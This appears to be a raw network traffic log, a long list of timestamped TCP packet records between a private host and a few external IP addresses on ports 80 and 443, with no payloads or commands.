                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.200659990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.200714111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.200714111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.201493025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.201509953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.201530933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.201540947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.201565027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.201610088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.202414036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.202430964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.202447891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.202498913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.202498913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.203284025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.203310013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.203336000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.203341961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.203345060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.203397989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.204205990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.204222918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.204240084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.204262972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.204262972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.204284906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205092907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205110073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205126047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205152035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205152035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205169916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205951929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205969095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205985069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.205998898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.206024885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.206024885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.206830025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.206845045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.206860065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.206875086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.206899881 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.206899881 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.207679033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.207743883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.207761049 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.207809925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.207809925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.208650112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.208673000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.208689928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.208719015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.208779097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.209501028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.209552050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.209567070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.209572077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.209583998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.209628105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.210412025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.210460901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.210477114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.210478067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.210505962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.210550070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.211283922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.211308956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.211328983 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.211349964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.211352110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.211424112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.212270021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.212285042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.212302923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.212326050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.212326050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.212343931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.213023901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.213076115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.213082075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.213099957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.213138103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.213138103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214001894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214024067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214041948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214061975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214062929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214116096 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214874029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214890003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214905977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214940071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.214952946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.215756893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.215773106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.215789080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.215814114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.215814114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.215882063 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.216666937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.216768026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.216867924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.216908932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.216927052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.216943979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.216980934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.216980934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.217833996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.217850924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.217866898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.217889071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.217889071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.217943907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.218703032 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.218744040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.218758106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.218775034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.218800068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.219070911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.219611883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.219722986 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.219738960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.219738960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.219777107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.219777107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.220475912 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.220532894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.220550060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.220572948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.220572948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.220642090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.221384048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.221400023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.221421957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.221437931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.221438885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.221463919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.222322941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.222338915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.222354889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.222378969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.222378969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.222464085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.223191977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.223206043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.223222017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.223246098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.223246098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.223330975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.224013090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.224073887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.224076986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.224091053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.224128962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.224128962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.224961996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.224978924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.224994898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.225023985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.225023985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.225069046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.225816011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.225871086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.225909948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.225980043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.235702038 CET4434986720.233.83.145192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.235817909 CET4434986720.233.83.145192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.235884905 CET4434986720.233.83.145192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.235903025 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.235935926 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.236699104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.236725092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.236741066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.236769915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.236769915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.236799002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.237199068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.237248898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.237265110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.237265110 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.237314939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.237314939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.238038063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.238086939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.242000103 CET49867443192.168.2.420.233.83.145
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.384128094 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.384152889 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.384234905 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.384601116 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.384635925 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389343023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389360905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389378071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389389038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389425993 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389425993 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389710903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389744043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389760017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389791965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.389810085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.390625954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.390641928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.390659094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.390707970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.390707970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.391490936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.391508102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.391525030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.391549110 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.391549110 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.391567945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.392342091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.392390966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.392429113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.392445087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.392505884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.393218040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.393296957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.393311977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.393372059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.393372059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.394109011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.394151926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.394167900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.394236088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.394256115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.395010948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.395088911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.395106077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.395183086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.395183086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.395879984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.395945072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.395961046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.396001101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.396028042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.396786928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.396836042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.396852016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.396857977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.396883011 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.396894932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.397733927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.397748947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.397757053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.398030996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.398649931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.398716927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.398901939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.398917913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.398955107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.398955107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.399543047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.399573088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.399589062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.399606943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.399606943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.399627924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.400446892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.400464058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.400479078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.400501013 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.400533915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.401284933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.401300907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.401316881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.401343107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.401371002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.402246952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.402302027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.402318001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.402359009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.402391911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:54.403038979 CET804986031.41.244.11192.168.2.4
